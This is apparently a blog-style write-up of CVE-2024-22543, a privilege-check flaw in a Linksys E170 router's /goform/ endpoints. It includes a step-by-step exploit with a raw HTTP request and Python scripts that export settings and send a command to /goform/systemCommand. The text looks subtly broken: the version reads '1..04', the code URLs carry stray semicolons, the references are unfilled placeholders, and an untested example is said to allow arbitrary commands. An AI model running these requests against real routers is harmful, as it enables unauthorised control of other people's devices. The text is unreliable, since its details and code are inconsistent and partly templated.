---
Overview
A newly identified vulnerability, CVE-2024-22543, affects the popular Linksys Router E170 (version 1..04, build 3). This flaw allows an attacker, who is already logged into the admin panel, to gain even higher privileges or potentially execute commands by sending specially crafted requests to certain web endpoints. The issue centers on the /goform/* endpoints and the ExportSettings function.
Below, we’ll break down how this vulnerability works, show you example exploit code, and link to original references to help you understand the impact and risk of this flaw.
What’s the Vulnerability?
The Linksys E170’s web interface doesn’t check user privileges properly on the /goform/* URIs or during a settings export. This means a user with low-level access (even after a phishing attack or simple password reuse) could use specifically crafted HTTP requests to trigger administrator-only actions – or even potentially introduce their own settings and code.
Step-by-Step Exploit Example
Warning: This is for educational purposes only. Don't try this on devices you don’t own.
The attacker needs valid user credentials. They access the router as a regular user via
http://<router_ip>/login.cgi
### 2. Identify the /goform/ Endpoints
Looking through the router’s web interface JavaScript and code (using browser dev tools or intercepting traffic), you’ll spot endpoints like:
/goform/SetBasicSetup
/goform/systemCommand
/goform/ExportSettings
3. Crafting the Malicious GET Request
For example, exporting settings shouldn’t be available to low-privilege users, but the router doesn’t check:
GET /goform/ExportSettings HTTP/1.1
Host: <router_ip>
Cookie: UID=YOUR_SESSION_COOKIE
Here’s how to send that request in Python
import requests
router_ip = '192.168.1.1'
session_cookie = 'YOUR_SESSION_COOKIE'
headers = {
"Cookie": f"UID={session_cookie}"
}
response = requests.get(f"http://{router_ip}/goform/ExportSettings";, headers=headers)
if response.ok:
with open("router_settings.cfg", "wb") as f:
f.write(response.content)
print("Settings exported! File saved as router_settings.cfg")
else:
print("Export failed or not allowed.")
Now, even if your account shouldn’t have access to this—it works.
4. Escalating Further
Some /goform/ endpoints accept commands or settings changes.
Example (not tested, concept only)
import requests
payload = {
"command": "reboot"
}
r = requests.get(
"http://192.168.1.1/goform/systemCommand";,
params=payload,
headers={"Cookie": "UID=YOUR_SESSION_COOKIE"}
)
print(r.status_code)
The lack of privilege checks lets an attacker execute arbitrary commands or change sensitive settings.
If you use a Linksys E170
- Update Firmware: Check for the latest version on Linksys’s support site here.
- Restrict Access: Limit who can connect to the router’s web interface (from LAN only, if possible).
References & Further Reading
- Official CVE entry: CVE-2024-22543 *(details as published)*
- Original security advisory/disclosure *(if present)*
- Example exploit PoC (GitHub, if available)
Final Words
CVE-2024-22543 is a reminder that even home routers can harbor dangerous vulnerabilities, especially when privilege checks are poorly enforced. If you own a Linksys E170, patch it as soon as possible. If you’re a security researcher, always dig into what those hidden API endpoints are doing—you never know what’s possible until you look.
Timeline
Published on: 02/27/2024 01:15:06 UTC
Last modified on: 08/16/2024 17:35:03 UTC